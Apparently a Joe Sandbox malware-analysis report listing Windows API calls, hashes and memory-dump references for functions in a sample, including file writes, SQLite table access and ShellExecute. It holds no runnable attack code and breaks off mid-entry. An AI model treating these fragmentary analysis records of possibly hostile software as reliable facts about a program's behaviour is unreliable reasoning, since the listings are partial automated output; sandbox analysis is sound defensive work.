                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                      • String ID:
                                                      • API String ID: 1549203181-0
                                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                      APIs
                                                      • memset.MSVCRT ref: 00412057
                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                      • String ID:
                                                      • API String ID: 3550944819-0
                                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                      APIs
                                                      • free.MSVCRT ref: 0040F561
                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$free
                                                      • String ID: g4@
                                                      • API String ID: 2888793982-2133833424
                                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: @
                                                      • API String ID: 3510742995-2766056989
                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                      • memset.MSVCRT ref: 0040AF18
                                                      • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@memcpymemset
                                                      • String ID:
                                                      • API String ID: 1865533344-0
                                                      • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                      • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                      APIs
                                                      • memset.MSVCRT ref: 004144E7
                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                      • memset.MSVCRT ref: 0041451A
                                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                      • String ID:
                                                      • API String ID: 1127616056-0
                                                      • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                      • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                      • memset.MSVCRT ref: 0042FED3
                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memset
                                                      • String ID: sqlite_master
                                                      • API String ID: 438689982-3163232059
                                                      • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                      • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                      APIs
                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                      • String ID:
                                                      • API String ID: 3917621476-0
                                                      • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                      • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                      APIs
                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                      • wcscat.MSVCRT ref: 0041101F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                      • String ID:
                                                      • API String ID: 822687973-0
                                                      • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                      • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                      • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                                      • malloc.MSVCRT ref: 00417459
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7556DF80,?,0041755F,?), ref: 00417478
                                                      • free.MSVCRT ref: 0041747F
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$freemalloc
                                                      • String ID:
                                                      • API String ID: 2605342592-0
                                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                      • String ID:
                                                      • API String ID: 2678498856-0
                                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Item
                                                      • String ID:
                                                      • API String ID: 3888421826-0
                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                      APIs
                                                      • memset.MSVCRT ref: 00417B7B
                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                      • String ID:
                                                      • API String ID: 3727323765-0
                                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                      APIs
                                                      • memset.MSVCRT ref: 0040F673
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                      • strlen.MSVCRT ref: 0040F6A2
                                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                      • String ID:
                                                      • API String ID: 2754987064-0
                                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                      APIs
                                                      • memset.MSVCRT ref: 0040F6E2
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                      • strlen.MSVCRT ref: 0040F70D
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                      • String ID:
                                                      • API String ID: 2754987064-0
                                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                      APIs
                                                      • memset.MSVCRT ref: 00402FD7
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                      • strlen.MSVCRT ref: 00403006
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                      • String ID:
                                                      • API String ID: 2754987064-0
                                                      • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                      • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                      APIs
                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                      • String ID:
                                                      • API String ID: 764393265-0
                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                      APIs
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Time$System$File$LocalSpecific
                                                      • String ID:
                                                      • API String ID: 979780441-0
                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                      APIs
                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$DialogHandleModuleParam
                                                      • String ID:
                                                      • API String ID: 1386444988-0
                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
